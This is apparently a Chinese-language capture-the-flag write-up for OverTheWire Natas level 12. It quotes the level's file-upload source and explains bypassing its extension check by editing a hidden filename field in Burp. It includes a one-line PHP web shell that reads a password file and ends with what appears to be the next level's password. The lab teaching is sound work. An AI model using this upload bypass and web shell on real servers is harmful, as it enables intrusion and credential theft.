natas solution(12)
Natas Level 11 → Level 12
Username: natas12
URL: http://natas12.natas.labs.overthewire.org
这一关还算简单,不过对于思想上又有一些启发。首先进入界面是选择一个文件并且上传,那么我们可以试着上传一个后门看看,编写payload
<?php
passthru('cat /etc/natas_webpass/natas13');
?>
上传发现被改成了 xxxx.jpg 那么很明显被动了手脚。二话不说看源码
if(array_key_exists("filename", $_POST)) {
$target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
}
function makeRandomPathFromFilename($dir, $fn) {
$ext = pathinfo($fn, PATHINFO_EXTENSION);
return makeRandomPath($dir, $ext);
}
function makeRandomPath($dir, $ext) {
do {
$path = $dir."/".genRandomString().".".$ext;
} while(file_exists($path));
return $path;
}
function genRandomString() {
$length = 10;
$characters = "0123456789abcdefghijklmnopqrstuvwxyz";
$string = "";
for ($p = 0; $p < $length; $p++) {
$string .= $characters[mt_rand(0, strlen($characters)-1)];
}
return $string;
}
这样一看好像没有看到哪里对后缀名动手脚呐?这也是我觉得这关有趣并启发我的地方,我们再看看这一部分
<?
if(array_key_exists("filename", $_POST)) {
$target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
}
?>
<form enctype="multipart/form-data" action="index.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="1000" />
<input type="hidden" name="filename" value="<? print genRandomString(); ?>.jpg" />
Choose a JPEG to upload (max 1KB):<br/>
<input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
可以看到提交时的filename其实是在一个hideen的input里。这就是这一关有意思的地方👉
启发
粗看源码的时候,我以为这个所谓的 $_POST["filename"] 指的是上传文件名,实则不然。可以清楚的看到是通过genRandomString函数然后拼接.jpg后缀。
以前的我拿到源码就轻易地认为得到了🔑经过这一关即便有源码也栽跟头后,醒悟即便是有了源码也能通过一些心理死角(具有误导性的变量名)来迷惑你
我们这回在上传的时候用burp抓包修改后缀为.php即可。
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
|